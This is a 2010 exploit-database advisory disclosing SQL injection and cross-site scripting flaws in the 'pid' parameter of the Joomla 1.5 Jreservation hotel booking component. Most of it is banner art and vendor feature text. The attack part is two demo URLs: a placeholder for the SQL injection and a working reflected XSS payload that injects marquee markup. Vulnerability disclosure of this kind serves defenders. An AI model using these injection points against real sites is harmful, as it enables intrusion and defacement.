Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting

EDB-ID:

13794

CVE:

N/A




Platform:

Multiple

Date:

2010-06-09


       ============================================================
       Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability
       ============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability
Date : june, 9 2010
Vendor url :http://jforjoomla.com/
Platform: Windows
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members.

###############################################################################################################
Description:

Joomla 1.5 Jreservation Component for hotel booking system.
Jreservation is a specially designed component for hotel owners who provides lodging facility & online booking for the rooms like deluxe, Air conditioned, Non Air conditioned. By using this Joomla 1.5 Jreservation component you can add multiple room types, amenity types like room amenity or property amenity. Amenity are like additional services which the hotel owner provides with the room e.g. Telephone, internet connection, cable connection and property amenity like swimming pool, gym, etc. With the help of a calender the user or a customer of the hotel can check rooms availability also book room as a provisional booking.

Features of Joomla 1.5 Jreservation component :-
1.Native Joomla 1.5
2.Multiple properties are supported.
2.Admin can add / edit rooms/ room types
3 Admin can add / edit rooms/ rooms.
4.Admin can add / edit room amenities/ Property amenities.
5.Detailed search for user to search for available rooms.
4.Hotel owner can show hotel images in a slideshow.
5.Owner can upload multiple images to the admin.
6.Owner can add multiple rooms,room type, room rent in an easy way.

###############################################################################################################

Xploit: SQLi Vulnerability

DEMO  URL:

       http://site.com/cd-hotel/Property-Cpanel.html?pid=[SQLi]

###############################################################################################################

Xploit: XSS Vulnerability

DEMO URL :

    http://site.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>

###############################################################################################################
# 0day no more 
# Sid3^effects